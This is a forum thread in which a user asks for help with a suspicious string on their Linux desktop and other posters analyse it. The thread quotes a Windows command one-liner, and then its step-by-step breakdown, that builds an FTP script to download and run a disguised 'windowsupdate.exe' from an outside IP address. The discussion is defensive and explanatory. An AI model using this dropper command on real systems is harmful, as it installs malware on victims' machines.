Someone is trying to hack me.

[Rudy Toody]

c echo open 72.64.46.25 21 >> ik &echo user windows update >> ik &echo binary >> ik &echo get windowsupdate.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &windowsupdate.exe &exitecho You got owned

I use Linux AMD64 OS and this hack appears to be Windows, so I don't think it is doing any harm.

A pdf file on my desktop will pop open and the code segment then scrolls by in the Find box of the pdf viewer.

Questions:

1. How does this get in?
2. How can I stop it?
3. Where do I report this?

 

[unokitty]

Thinking out loud here...

Looks like you have encountered a bot that is trying to create a file called ik on your system. The ik file contains instructions that it then passes on to the "ftp" command. For example:

ftp> open 72.64.46.25 21
ftp> user windows update
ftp> binary
ftp> get windowsupdate.exe
ftp> bye

ftp -n -v -s:ik
del ik &windowsupdate.exe
exit

You got owned

In operation, it would appear to download what I would assume to be a trojaned windows update executable from a server at 72.64.46.25.

Then, it would appear to attempt to upload and delete the ik file. And finally,it prints out "You got owned."

Notes
A reverse IP lookup shows:
Resolve Host: pool-72-64-46-25.nrflva.east.verizon.net (72.64.46.25)
IP Location: United States United States, Norfolk, Verizon Internet Services (72.64.46.25)

Suspect that that is a previously compromised system.

How does it get in?
Though one of your open ports. Are you running VNC or similar?

How can I stop it?
Close that open port...

Where do I report this?
Don't have an answer for this...

Best of luck,
Uno

 

[Rudy Toody]

According to Gibson Research's Shields Up! the only open port is 80, which is used by apache2 to serve up files from one folder only.

 

[unokitty]

Is it possible that this is some sort of a "drive by" download?

If it is, it could be coming in through your Internet connection when you surf an infected site...

Since it appears to be a Window Hack, I don't know how much it would concern me...

Perhaps someone else can provide some insight...


Best of luck,
Uno

 

[Rudy Toody]

I discovered that I still had VNC installed from when I was playing around with controlling two other computers from this one. It didn't work as well as I would have preferred, so I decided not to do it. BUT! I forgot to uninstall VNC. I'll give it a few days to see if that is the fix. Thanks for the help.

Edit: Long time, 15 hours so far. No see.

 

[wayliff]

I discovered that I still had VNC installed from when I was playing around with controlling two other computers from this one. It didn't work as well as I would have preferred, so I decided not to do it. BUT! I forgot to uninstall VNC. I'll give it a few days to see if that is the fix. Thanks for the help.

Edit: Long time, 15 hours so far. No see.

hey Rudy - try reporting it here...
http://www.ic3.gov/default.aspx

 

[MrColin]

Unless you have locked your browsers down with SELinux/AppArmor/and disabling scripts, you can still run malicious javascript from compromised/hostile websites. I don't think its very far into the future before we see some of these things trojaning the linux desktop also.

EDIT: Adding: I think you probably got that file web browsing via drive-by download.